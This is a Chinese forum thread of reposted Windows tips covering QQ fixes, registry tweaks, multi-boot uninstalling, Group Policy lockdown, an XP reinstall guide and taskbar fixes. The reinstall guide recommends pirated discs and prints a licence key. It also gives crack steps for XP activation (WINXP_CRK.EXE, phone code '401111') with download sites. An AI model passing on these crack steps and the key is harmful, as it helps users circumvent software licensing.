在“参数设置”里面将“总在最前面”选项去掉,保存设置,然后再打开设将此项选中保存,问题解决。这很有可能是QQ的一个BUG,其实很多软件也会出现某个功能失效的情况,那么先去掉这个功能保存设置,然后再重新设置多半就能解决问题。

如果在使用QQ的过程中,系统异常死机或者重新启动,那么很有可能造成QQ数据的丢失。这样下次在登录QQ时,系统将提示你数据出现错误而无法登录。遇到这样的情况不必惊慌,重新运行注册向导多半就可以解决问题,因为QQ在其目录下给每个登录的号码都建立了一个与之相对应的目录,其相关的设置和数据都保存在该目录中。重新进行注册向导,只是对该目录重新设置,这样可以修复错误,并且尽可能地保存数据。对于有时候无法登录的情况,利用注册向导也可以使你轻松登录。

为了加快聊天的速度,我们可以在QQ中设置快捷键,这样只利用键盘就可以完成聊天发送的工作。但是有时候发现快捷键无法使用,这里有两种原因。一种是你所使用的QQ不是安装的,而是使用直接备份的目录,虽然这样也是可以使用的,但是容易出现问题,所以建议你重新安装。另外一种就是和其它的快捷键有冲突,这个有时候很难判断,因为很多软件都有快捷键,并且在出现冲突的时候系统并不会提示是和哪里软件有冲突,因此在设置快捷键的时候尽量不要用到很常用的组合。

在Windows系统中有一种自动记忆功能,例如自动记录网址、用户名称等等,这样是给我们在使用上带来了一些方便,但同时也带来的安全的隐患,那么让小滔教你如何隐藏你的登录名。

在Windows中隐藏登录名

不同的系统中,其操作方法是不相同的。在Win98中的“运行”菜单中输入“regedit”启动注册表,并且定位到“HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Winlogon”键值,然后在右边窗口中新建一个名为“DontDisplayLastUserName”的字符串值,并把值设置为“1”,重新启动计算机,上次登录的用户名字就被隐藏了。

在Win2000中要复杂一些。同样是运行注册表程序,找到“HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon”,将其中的“DontDisplayLastUserName”的值修改为“1”,如果没有则新建立这项,并修改其值。然后对“DefaultUserName”这一项,修改其值为空。保存设置重新启动即可完成修改工作。

这次的技巧就谈完了。阿榕在这里提醒大家,在选择服务商一定要选择信誉好、服务全、并且比较大的公司,这样才能给你保证,同时还要注意数据的备份,否则你很可能就.......
作者: 语苛经历    时间: 2006-10-23 21:50
多系统的维护------卸载篇


Win98+Win2000(或Win98+WinXP)篇:
这是最常见的多操作系统的安装方式,优点就没有必要说了,但是有多少人知道如何在不损害Win98的情况之下卸载Win98呢?如何在不损伤Win2000的前提下卸载Win98呢?
卸载Win2000(WinXP): 用Win98启动盘启动电脑,在DOS下运行sys c:,然后重新启动,将C盘根目录下的boot.ini、BOOTFONT.BIN、BOOTLOG.PRV、bootsect.bak、bootsect.dos、NETLOG.TXT、NTDETECT.COM、NTLDR、NULL删除,最后删除Win2000安装驱动器里面的WINNT和Program Files目录。最后再重新启动启动,完成Win2000的卸载。
卸载Win98:卸载之前你必须准备一样东西:能够启动电脑的Win2000/XP的光盘,没有这个东西的话就没有办法在不伤及Win2000/XP的情况下卸载Win98。首先备份安装Win98的盘里面你需要备份的内容,然后使用98启动盘启动电脑,执行格式化命令,格式化安装98的分区,格式化完成之后用Win2000/XP的光盘启动电脑,安装程序会自动引导并且进入DOS下的安装引导程序的界面。由于Win2000盒WinXP在这里有所不同,所以我在这里将分开讲述:


保留Win2000:启动以后,会看到下面这个流程图:

开始安装Win2000 ----->
修复Win2000 鼓掌控制台修复
退出 紧急修复 -----> 手动修复 -----> 检查启动环境 有紧急启动盘
快速修复 验证Win2000系统文件 -----> 没有紧急启动盘
检查启动扇区 自动查找 -----> 修复即可

提示:按照箭头标记选择,红色部分要求用空格键全部选中。

保留WinXP:还是一样使用WinXP的启动盘启动,然后选择修复--使用故障控制台修复,进入到故障控制台里面,如果bootcfg /add,然后依次输入“1”“Microsoft Windows XP”“/fastdetect”“exit”(不包括引号的),然后删除C盘下以$开头的临时文件。

Win98+Win2000+WinXP篇:
这是目前比较常见的一种配置方案,下面将介绍如何单独卸载某一个操作系统。
卸载WinXP:登陆到2000,修改首选启动为Win2000,然后删除boot.ini里面的所有关于WinXP的内容,删除WinXP的安装文件,搞定。
卸载Win2000:登陆到WinXP,修改首选启动为WinXP,删除boot.ini里面关于Win2000的内容,删除Win2000的安装文件,搞定。
卸载Win98:还是需要一张能够启动机子的Win2000/XP的光盘,然后备份boot.ini文件以后格式化安装Win98的驱动器,然后用上面介绍的方法恢复Win2000/WinXP的启动环境(主要是用于恢复引导程序,建议用恢复WinXP的方法恢复),然后把备份的boot.ini里面关于Win98的内容删除以后放回C盘根目录并且覆已经存在的文件即可。
如果要只保留一个操作系统的话,按照上面的操作复合操作即可。

安装了Linux的电脑:
Linux自带LILO引导程序,如果还安装了98的话,用启动盘启动,执行sys c:就可以了。


上面介绍的方法比较简单,但是非常实用,学会以后对你维护你的系统是很有好处的。

多系统维护的常见误区:
boot.ini万能主义:诚然,在Win2000/XP中boot.ini是很重要的,但是boot.ini只是一个引导性的描述文件,真正的能够引导系统进入Win2000/XP的应该是多个文件的配合使用,而不是仅仅一个boot.jni就可以解决的了。很多时候有人认为只要备份boot.ini就可以起到恢复多引导菜单的目的,但是这是有条件的,条件就是主引导扇区没有被破坏掉,如果被破坏了,是不可能仅仅通过还原boot.ini的方法就解决恢复多引导菜单的问题的。破坏主引导扇区的方法很多,最常见的就是病毒和我们输入的一些指令:format、sys等等,如果主引导程序里面没有2000/XP的引导程序,那么就不会出现多引导菜单,即使boot.ini存在也无济于事。
作者: 语苛经历    时间: 2006-10-23 21:51
防范非法用户侵入系统


第一招:屏幕保护

在Windows中启用了屏幕保护之后,只要我们离开计算机(或者不操作计算机)的时间达到预设的时间,系统就会自动启动屏幕保护程序,而当用户移动鼠标或敲击键盘想返回正常工作状态时,系统就会打开一个密码确认框,只有输入正确的密码之后才能返回系统,不知道密码的用户将无法进入工作状态,从而保护了数据的安全。

提示:部分设计不完善的屏幕保护程序没有屏蔽系统的“Ctrl+Alt+Del”的组合键,因此需要设置完成之后测试一下程序是否存在这个重大Bug。

不过,屏幕保护最快只能在用户离开1分钟之后自动启动,难道我们必须坐在计算机旁等待N分钟看到屏幕保护激活之后才能再离开吗?其实我们只要打开Windows安装目录里面的system子目录,然后找到相应的屏幕保护程序(扩展名是SCR),按住鼠标右键将它们拖曳到桌面上,选择弹出菜单中的“在当前位置创建快捷方式”命令,在桌面上为这些屏幕保护程序建立一个快捷方式。此后,我们在离开计算机时双击这个快捷方式即可快速启动屏幕保护。

第二招:巧妙隐藏硬盘

在“按Web页”查看方式下,进入Windows目录时都会弹出一句警告信息,告诉你这是系统文件夹如果“修改该文件夹的内容可能导致程序运行不正常,要查看该文件夹的内容,请单击显示文件”,这时单击“显示文件”就可以进入该目录了。原因是在Windows根目录下有desktop.ini和folder.htt两个文件作祟。将这两个文件拷贝到某个驱动器的根目录下(由于这两个文件是隐藏文件,之前必须在文件夹选项中单击“查看”标签,选择“显示所有文件”,这样就可以看见这两个文件了)。再按“F5”键刷新一下,看看发生了什么,是不是和进入Windows目录时一样。

接下来我们用“记事本”打开folder.htt,这是用HTML语言编写的一个文件,发挥你的想像力尽情地修改吧。如果你不懂HTML语言也没关系,先找到“显示文件”将其删除,找到“修改该文件夹的内可能导致程序运行不正常,要查看该文件夹的内容,请单击显示文件”,将其改为自己喜欢的文字,例如“安全重地,闲杂人等请速离开”(如图1),将“要查看该文件夹的内容,请单击”改为“否则,后果自负!”,接着向下拖动滑块到倒数第9行,找到“(file://%TEMPLATEDIR%\wvlogo.gif)”这是显示警告信息时窗口右下角齿轮图片的路径,将其改为自己图片的路径,例如用“d:\tupian\tupian1.jpg”替换“//”后面的内容,记住这里必须将图片的后缀名打出,否则将显示不出图片。当然,你还可以用像Dreamweaver、FrontPage这样的网页工具做出更好的效果,然后只要将原文件拷贝到下面这段文字的后面,覆盖掉原文件中“~”之间的内容就可以了。

*This file was automatically generated by Microsoft Internet EXPlorer 5.0

*using the file %THISDIRPATH%\folder.htt.

保存并退出,按“F5”键刷新一下,是不是很有个性?接下来要作的就是用“超级兔子”将你所要的驱动器隐藏起来,不用重新启动就可以欣赏自己的作品了。最后告诉大家一招更绝的,就是干脆将folder.htt原文件中“~”之间的内容全部删除,这样就会给打开你的驱动器的人造成一种这是一个空驱动器的假象,使其中的文件更安全。



图1



第三招:禁用“开始”菜单命令

在Windows 2000/XP中都集成了组策略的功能,通过组策略可以设置各种软件、计算机和用户策略在某种方面增强系统的安全性。运行“开始→运行”命令,在“运行”对话框的“打开”栏中输入“gpedit.msc”,然后单击“确定”按钮即可启动Windows XP组策略编辑器。在“本地计算机策略”中,逐级展开“用户配置→管理模板→任务栏和开始菜单”分支,在右侧窗口中提供了“任务栏”和“开始菜单”的有关策略。

在禁用“开始”菜单命令的时候,在右侧窗口中,提供了删除“开始”菜单中的公用程序组、“我的文档”图标、“文档”菜单、“网上邻居”图标等策略。清理“开始”菜单的时候只要将不需要的菜单项所对应的策略启用即可,比如以删除“我的文档”图标为例,具体操作步骤为:

1)在策略列表窗口中用鼠标双击“从开始菜单中删除我的文档图标”选项。

2)在弹出窗口的“设置”标签中,选择“已启用”单选按钮,然后单击“确定”即可。

第四招:桌面相关选项的禁用

Windows XP的桌面就像你的办公桌一样,有时需要进行整理和清洁。有了组策略编辑器之后,这项工作将变得易如反掌,只要在“本地计算机策略”中展开“用户配置→管理模板→桌面”分支,即可在右侧窗口中显示相应的策略选项。

1)隐藏桌面的系统图标

倘若隐藏桌面上的系统图标,传统的方法是通过采用修改注册表的方式来实现,这势必造成一定的风险性,采用组策略编辑器,即可方便快捷地达到此目的。

若要隐藏桌面上的“网上邻居”和“Internet EXPlorer”图标,只要在右侧窗口中将“隐藏桌面上网上邻居图标”和“隐藏桌面上的Internet EXPlorer图标”两个策略选项启用即可。如果隐藏桌面上的所有图标,只要将“隐藏和禁用桌面上的所有项目”启用即可。当启用了“删除桌面上的我的文档图标”和“删除桌面上的我的电脑图标”两个选项以后,“我的电脑”和“我的文档”图标将从你的电脑桌面上消失了。如果在桌面上你不再喜欢“回收站”这个图标,那么也可以把它给删除,具体方法是将“从桌面删除回收站”策略项启用。

2)禁止对桌面的某些更改

如果你不希望别人随意改变计算机桌面的设置,请在右侧窗口中将“退出时不保存设置”这个策略选项启用。当你启用这个了设置以后,其他用户可以对桌面做某些更改,但有些更改,诸如图标和打开窗口的位置、任务栏的位置及大小在用户注销后都无法保存。



第五招:禁止访问“控制面板”

如果你不希望其他用户访问计算机的控制面板,你只要运行组策略编辑器,并在左侧窗口中展开“本地计算机策略→用户配置→管理模板→控制面板”分支,然后将右侧窗口的“禁止访问控制面板”策略启用即可。

此项设置可以防止控制面板程序文件的启动,其结果是他人将无法启动控制面板或运行任何控制面板项目。另外,这个设置将从“开始”菜单中删除控制面板,同时这个设置还从Windows资源管理器中删除控制面板文件夹。

提示:如果你想从上下文菜单的属性项目中选择一个“控制面板”项目,会出现一个消息,说明该设置防止这个操作。

第六招:设置用户权限

当多人共用一台计算机时,在Windows XP中设置用户权限,可以按照以下步骤进行:

1)运行组策略编辑器程序。

2)在编辑器窗口的左侧窗口中逐级展开“计算机配置→Windows设置→安全设置→本地策略→用户权限指派”分支。

3)双击需要改变的用户权限,单击“添加用户或组”按钮,然后双击想指派给权限的用户账号,最后单击“确定”按钮退出。

第七招:文件夹设置审核

Windows XP可以使用审核跟踪用于访问文件或其他对象的用户账户、登录尝试、系统关闭或重新启动以及类似的事件,而审核文件和NTFS分区下的文件夹可以保证文件和文件夹的安全。为文件和文件夹设置审核的步骤如下:

1)在组策略窗口中,逐级展开右侧窗口中的“计算机配置→Windows设置→安全设置→本地策略”分支,然后在该分支下选择“审核策略”选项。

2)在右侧窗口中用鼠标双击“审核对象访问”选项,在弹出的“本地安全策略设置”窗口中将“本地策略设置”框内的“成功”和“失败”复选框都打上勾选标记(如图2),然后单击“确定”按钮。

3)用鼠标右键单击想要审核的文件或文件夹,选择弹出菜单的“属性”命令,接着在弹出的窗口中选择“安全”标签。

4)单击“高级”按钮,然后选择“审核”标签。

5)根据具体情况选择你的操作:

倘若对一个新组或用户设置审核,可以单击“添加”按钮,并且在“名称”框中键入新用户名,然后单击“确定”按钮打开“审核项目”对话框。

要查看或更改原有的组或用户审核,可以选择用户名,然后单击“查看/编辑”按钮。

要删除原有的组或用户审核,可以选择用户名,然后单击“删除”按钮即可。

6)如有必要的话,在“审核项目”对话框中的“应用到”列表中选取你希望审核的地方。

7)如果想禁止目录树中的文件和子文件夹继承这些审核项目,选择“仅对此容器内的对象和/或容器应用这些审核项”复选框。

注意:必须是管理员组成员或在组策略中被授权有“管理审核和安全日志”权限的用户可以审核文件或文件夹。在Windows XP审核文件、文件夹之前,你必须启用组策略中“审核策略”的“审核对象访问”。否则,当你设置完文件、文件夹审核时会返回一个错误消息,并且文件、文件夹都没有被审核。
作者: 语苛经历    时间: 2006-10-23 21:52
重装电脑的操作系统,是我们每一个电脑爱好者必须经历的苦难过程。不自己动手装电脑系统和应用程序的电脑操作者,至多是个菜鸟。(当然就是能熟练装这些东东,也不一定不是菜鸟,比如我只是一个比较肥胖的菜鸟而已)那么,装电脑的操作系统和应用程序要注意些什么问题呢?
1.选择操作系统
这个即使我不说,多数人都知道,嘿嘿。当然是微软的Windows了。因为这个操作系统的功能、视觉效果以及对各种应用程序的兼容性是其它系统所不能比拟的。如果你有银子(或者说你的银子太多,烧的不行),你最好买正版的Windows XP(以下简称XP),再加装它的sp1补丁;这是目前最稳定、兼容性最好的操作系统。XP的最低要求配置是CPU 1000mhz,内存256M。不要理会微软说的最低要求配置(微软要求的配置太低)。如果你的电脑的配置低于这个标准,最好不要装XP系统。否则,你反而是坐上牛车了,你就慢慢摇吧!
(不过,现在的老机子除了主板不好进行硬件升级,其它的像CPU、内存条、声卡、显卡、调制解调器等都可以升级,主板可以下载主板生产厂家同型号及同版本号的主板BIOS最新驱动程序;对于主板的BIOS升级,我把我的笔记本和台式机都升了,没有质量十分好的软驱和软盘,千万不要盲目行动。主板升级的直接效果并不明显,对于速度几乎没有什么影响,如果你的电脑主板有USB1.1功能并且能用,就不要追新了。主板追新出了问题,只有去专门的电脑维修站重整)
当然,像我说的,除了主板硬件不升级,其它即插即用硬件全部升级,也要不少银子的。我估计2000-2500元RMB吧,这样你的电脑就是很高的配置了:CPU1.5G以上,内存256M以上,56K猫,显卡缓存32M。不过,不升级硬件也可以,那样我们只好就用Windows 98或Windows Me了。这两个系统没有实质性的区别。Me的界面好看,但Me的系统还原功能实在不能恭维。二者共同的毛病是不稳定,死机;热启动、reset是每次上机不可缺少的保留节目。系统经常丢失文件,并且随着多次装卸应用软件,系统变得越来越慢、越不稳定直至重装系统。
不管那个系统的光盘,都可以在盗版光盘市场买到。(4-5元/张)在光盘市场,98和Me都是绝对的正版,没有什么好讲的。微软给XP增加了激活功能(所谓激活,就是你装完XP后必须在30天之内通过网络或电话与微软联系激活你的系统,否则只能用30天你就进不去系统了。只有在安全模式下可以进入。这是微软反盗版的一种手段。),目前XP最好的激活方法有三种,⑴算号激活。网上有国外黑客破解编写的XP算号器,你可以直接下载,里面有详细的使用方法。采用这种方式激活的系统绝对是正版,但是比较麻烦(进www.google.com网站搜索Windows XP算号器)⑵使用俄罗斯黑客采用电话激活(不用真打电话)。该激活方式简单易行,支持系统升级,目前没有发现任何方面的问题。(下载地址:www.arongsoft.com)⑶OEM激活。该方法比较麻烦,需要修改BIOS驱动程序,建议一般人不要采取这种方法。(具体激活方式:www.arongsoft.com的论坛)
最好、最简单的并且支持升级的激活方法是俄罗斯黑客电话激活方式。我即采用这种激活方式将我的系统升级为XP sp1版本了。
据说,微软的最新操作系统Windows 2003将于二○○三年五月二十二日发布。让我们拭目以待,尽快能享受到微软最新操作系统给我们带来的极速快乐。^_^
至于有人要问,你为什么不提Windows 2000呢?尽管2000的稳定性较好(强于98和Me,次于XP),但兼容性太次,好多应用软件不能在2000上运行。所以,在有XP的情况下,谁装2000,谁就是傻子。^_^

2.装系统前的备份工作
你的电脑上不可避免地存有很多资料和信件。我们不能因为装系统就把这些东西丢掉吧?怎么办?我们可以百分之百地把它们备份在其它盘上。如果你的电脑已经爬下了,连机也开不了,那么你手动关机;再开机,按住F8进入安全模式然后进行以下操作。
⑴在本机盘上备份
如果你的机子的文件系统是FAT形式、并且你以前至少把硬盘已经分为两个以上的区,你就可以把你的信件、邮箱帐户、通讯薄、数据材料统统存在非系统盘上(你总不至于没有分区吧?如果你只用一个区,那你不是一个超级懒汉,就是一个超级菜鸟^_^)
如果你用的是系统自带的Outlook Express做你的邮件终端接发,你可以把信件、通讯薄和帐户全数导出。
信件导出:打开OE,点击工具,点开选项,再点击维护,点击存储文件夹,点击更改,改设为非系统盘上,如D:\我的信件。确认。
帐户导出:打开OE,点击工具,再点击帐户,点邮件,一个一个选中邮件,点击右边的导出,设置非系统盘文件夹,如:D:\我的帐户;保存。
通讯薄导出:打开OE,点击文件,再点击导出,点击通讯薄,选择存储位置,如D:\我的帐户,保存。
我的文档导出:右键点击桌面我的文档,再点击属性,点击移动,设置非系统盘如D:\我的文档,确定。
⑵如果你有活动硬盘,你最好把上面说的内容存到活动硬盘上。只是把存储地点的盘符改为活动硬盘的盘符。(现在,一个活动硬盘大约1000元左右(40G的容量,USB2.O兼容USB1.1)如果你现在的系统是98,你就得装USB驱动,否则不能认活动硬盘;如果是Me或2000、XP,就不用装USB驱动了。顺便说一下活动硬盘,有了这个玩意,连笔记本都可以不拿了。平时把我们要用的图、数据存进去,随身一带,方便之至!现在,没有电脑的单位恐怕不多了吧,不管我们去哪里办事带上它就可以了。
⑶ 输入法词库记忆备份
如果你操作这台电脑有一段时间了,你必然使用文字输入了。这样,你的语言习惯和用词习惯电脑已经适应和记忆了。我们可以把字库文件备份出来,该文件的位置:
c:\windows\system32\IME
总之,我们在使用电脑时,尽量不要在系统盘(一般就是C:盘)上放重要数据。我的信件、(我用的邮件客户端是BECKY2.05.10)、资料和常用软件分别存放在D:、E:和活动硬盘上。

3.CMOS设置
一般的电脑在正常使用时都应该把第一启动引导顺序设置为分区时的激活盘,其它如光驱、软驱就不要搞启动检测了。这样,既有利于启动速度,又能延长光驱、软驱的使用寿命;同时没有了启动检测时“嘎吱嘎吱”的噪音。但是,我们装系统时可就不能从硬盘的激活盘启动了。怎么办?如果你的硬盘的操作系统是FAT系统,你最好格式化一下装系统的盘,如一般是C:盘,清除长时间留下的垃圾。这就要设置CMOS启动引导顺序的第一位是A:盘了(也就是软驱)。
格式化的具体操作:
关机,软驱放入98启动软盘,启动,进入DOS状态,选择2(带光驱启动),在c:\后输入:(不包括前面的冒号)format c:;然后回答系统提问输入Y,回车,一路回车就可以了。
如果你的硬盘的文件系统是NTFS或者你不想格式化硬盘的,或者已经格式化完了,你必须把你的COMS设置为光驱为第一引导启动。
CMOS设置:(以Award主板为例,其它主板亦基本相同)
启动电脑按DEL键(有的电脑是F2键),进入CMOS设置,进入BIOS FEATURES SETUP,再进入Boot Sequence按上下键选CD-ROM,C,A,再按ESC键、F10键、Y、回车即可,手动关机或放入安装光盘后按reset键。(安装光盘最好是有自启动功能的)
4.装系统(下面以安装WINDOWS XP为例)
我选的是没有任何破解的、完整的Windows XP安装光盘。启动电脑,当出现“光盘启动按任意键”字样时回车,开始复制安装程序,检验系统盘位置的容量和格式,这些都可以不理;出现对系统硬盘的文件格式的选择时最好选FAT32,不要选NTFS。尽管NTFS文件体系对操作系统的稳定性和速度以及硬盘管理功能有很大的提高,但NTFS只是支持以NT为内核的Windows NT、Windows2000、WindowsXP,不支持DOS、WindowsME、Windows98。所以,对于我们经常玩软件的人并不适合。一旦出现系统崩溃,在NTFS下有可能要通过重新分区、格式化等手段来重新安装系统,只要重新分区,硬盘上的资料和数据就彻底完蛋了。(这是我吃了无数亏得来的教训,当年在使用Windows2000时,我就采用了NTFS系统,主要用以防止CIH病毒对系统和硬件的超级破坏,可现在防、杀CIH太容易了)相反,在FAT32文件系统下,只要有一张98或Me的启动盘格式化一下C盘就可以重装系统了,也不怕丢失所有硬盘上的数据和资料。(关于分区,这里就不说了,以后有机会专门说说分区,包括FDISK和DM的实战操练,分区是一项比较危险和麻烦的事情)
接着,复制系统文件,准备安装等步骤。出现选择时区、语言等对话框,这就不用我说了吧。耐心等待。
如果是在DOS下原始安装XP,则必须先把smartdrv.exe文件(在Win98的安装目录下,名为smartdrv.exe)拷入98启动软盘,安装之前运行一下就可以大幅度提高安装速度。(我在安装之前有时候运行一下,有时候忘了,可我没有感觉到有多大的差别,也可能我的两台电脑比较新?说不清)
如果你是在原有系统不变、系统硬盘上有操作系统的情况下重新安装XP,在安装的过程中会出现《升级/全新安装》对话框,此时你必须选择升级,除非你想在你的机子上安装双操作系统。
要求输入序列号时输入以下号码:
BX6HT-MDJKW-H2J4X-BX67W-TVVFG
这个注册码基本都能安装(我最少试了5、6种XP安装光盘了)
一般安装时间不超过60分钟。
安装完毕,选择现在不激活以后激活,按下一步,至少填入一个名字,如JixXP,一路回车键,可以了。
现在开始激活系统:我采用的是俄罗斯黑客的激活办法。见下面使用说明:

方法:把SETUPREG.HIV复制到%systemroot%system32\目录下
覆盖原文件(我倒是找不到这个SETUPREG.HIV,直接粘贴上去的),
重启,
按F8进入安全模式,以管理员身份登录,
运行WINXP_CRK.EXE,重启,进入WinXP,在要求激活时选择“电话激活”,在每个方框中都填入“401111”----激活成功!

阿榕软件园 http://arongsoft.com 提供下载

不用多说了吧。我只告诉你一个字:棒!!!

4.必要的设置和部分驱动程序的安装
⑴ 进入《控制面板》(或鼠标右键点击我的电脑、再点击属性),打开《系统》,选《系统还原》,选择关闭所有盘的还原功能。
⑵ 在《系统》里,点《高级》,重新设置《错误报告》(不关了这个选项,老是出现向比尔.盖兹告状的申请单,烦死人了)
⑶ 一般笔记本电脑声卡、显卡、猫的驱动XP里全有,并且基本能自动安装。我重点说一下台式机。
点开《控制面板》,点《系统》,再点《硬件》,点《设备管理器》,把里面有问号和感叹号的项目全部卸载,点确定关了《系统》项目。
取出你随机带得驱动程序盘,放入光驱里;再点控制面板里面的《添加硬件》,出现选择对话框时,你如果知道你的驱动程序的目录和位置,你可以选手动选择;如果不知道,选择自动。
声卡、显卡、猫安装驱动都是一样的做法。如果你没有XP的专用驱动程序,有两个办法能解决你的问题。其一,你可以用该即插即用设备的Win2k(也即Windows2000)驱动程序进行安装,XP和2K的内核一样,驱动程序没有区别。在安装过程中可能会出现没有微软签名的对话框,不要理它,直接点“是”;如果你连Win2k的驱动也没有,那就只有另一个办法了,先找出你的设备的生产厂家和型号,一般说明书上或板、卡上面都把厂家和型号打印上去了,然后从能上网的电脑上进厂家的网站,选中型号后直接下载。再用软盘或优盘或活动硬盘转存在你的电脑上,进行安装。(软盘容量小,恐怕放不下。)
⑷ 显卡设置
点控制面板里的显示,其它选项可根据你的电脑情况做相应的选择。最好象素选800×600,32真彩色。点《高级》,点击《监视器》,屏幕刷新频率阴极射线管显示器选75HZ或85HZ,液晶显示器选60HZ。
⑸ 设置网络连接
宽带设置我就不说了,只说一下拨号上网的设置。
点控制面板里的《网络连接》,点《创建一个新连接》,点《连接Intelnet》,点《手动设置》,点《调制解调器》,再添名称如:xxx,电话号码添16900,密码添16900,验证密码再添16900。就可以上网了。
⑹ 声音设置
点控制面板里的《声音和音频设备》,选中《把音量图标放入任务栏》,点击应用;至于其它选项,可以根据你的电脑的实际情况和你自己的爱好进行相关设置。

5.恢复信箱、帐号和通讯薄
按照导出时的菜单步骤,将原来的“导出”换为“导入”进行操作就可以了。(不用重复了吧,呵呵,要是反操作不了,你就实在太笨了,也就不要看这篇文章了)

6.恢复字库
将备份字库信息打开,如果有恢复程序就直接点击,如果没有就直接代替。我这主要是针对智能ABC和紫光拼音输入法。其它输入法我没有用过,不熟悉,你最好自己研究研究。

7.我的文档重新设置
重复导出时的步骤,将两个文件夹合并、链接起来就可以了。

8.建议你的电脑上装以下实用软件:
⑴ Winzip8.1 (通用压缩软件)
⑵ WinRAR3.2 (最好的压缩软件)
⑶ Microsoft OfficeXP (国际通用办公系统)
⑷ AcadSee5.0 (图形识别软件)
⑸金山词霸2003 (即时英汉翻译软件)
⑹金山毒霸2003 (最好的国产杀毒软件)
⑺Winamp2.8 (最好的Mp3音乐播放软件)
⑻ WinDVD4.0 (DVD、VCD音像播放软件)
⑼FlashGet1.40 (最好的网上下载工具)
以上软件都是我比较喜欢的。一般都能从网上下载。像Office XP、金山词霸、金山毒霸等这样的软件太大,最好买光盘安装。
除此而外,最好装一个系统优化的软件。国产的系统优化软件里首推Windows优化大师(作者:鲁锦)和超级兔子魔法设置(作者:蔡旋)。WindowsXP本身的优化性极强,再进行系统优化已没有什么实际意义。但WindowsXP对CPU的二级缓存没有设置,可以用这两个软件中的任何一个优化一下。如我的笔记本的CPU二级缓存是256K,我没有进注册表重新设置,而是用兔子魔法设置的。
最近,我在网上发现Windows优化大师的作者鲁锦说,优化大师的破解版在60天左右会发作,破坏系统。所以,我就再也不敢用优化大师了。我劝朋友们都不要用破解版了,小心坏了系统。用的话,花上30元RMB,不算贵。

9.最后一项,进行磁盘碎片整理
打开《我的电脑》,鼠标右键点击c:,点击《属性》,再点击《工具》,点击《开始整理》,最后点击《碎片整理》,等待整理完毕后点击确认。

至此,本次安装完毕。
作者: 语苛经历    时间: 2006-10-23 21:54
使用Windows XP操作系统的用户,都遇到过这样的现象:操作过程中想在任务栏中切换窗口时,忽然发现点击任务栏中的图标没有任何反应了,就像系统死机一样,这就是Windows XP中常见的任务栏失去响应,又被称为“任务栏假死现象”。我们可以用下面的方法解决它。

  1.禁用高级文字服务

  Windows XP的“高级文字服务”包括了语音、手写和中文键盘输入服务,我们常用的输入法在Windows XP中也被归入高级文字服务。但是某些服务,如手写或语音功能可能与某些软件存在冲突,最明显的反应就是任务栏失去响应。例如我们清除文档记录点击“确定”或者打开多个IE快速关闭时,任务栏假死现象就很可能发生。

  其实高级文字服务中的语音、手写功能使用的人并不多,我们完全可以将其关闭。打开“控制面板”,点击“切换到经典视图”,双击“区域和语言选项”,在对话框中点击“语言”标签,再单击“详细信息”按钮,在打开的“文字服务和输入语言”对话框中点击“语言栏”,选中“关闭高级文字服务”选项后保存设置即可。

  由于中文输入法也属于高级文字服务的一部分,因此关闭服务后导致的结果就是输入法切换栏消失,我们就只能用快捷键“Ctrl+Shift”来切换输入法了。

  2.关掉视觉特效并使用经典开始菜单

  有些时候的任务栏假死有可能和视觉特效有关,例如在快速关闭多个IE时产生的任务栏假死。这时我们可以在桌面“我的电脑”图标上单击鼠标右键,选择“属性”,点击“高级”标签,单击“性能”区中的“设置”按钮,在打开的“性能选项”对话框中选择“调整为最佳性能”,把所有特效关闭后保存退出。然后在“开始”按钮上点击右键,选择“属性”,选择“经典开始菜单”选项后点击“确定”保存。
作者: 海西红狼    时间: 2009-5-20 15:22
标题: 顶。好啊高手





欢迎光临 华工象棋论坛 (http://www.hgchess.com/BBS/) Powered by Discuz! X3.2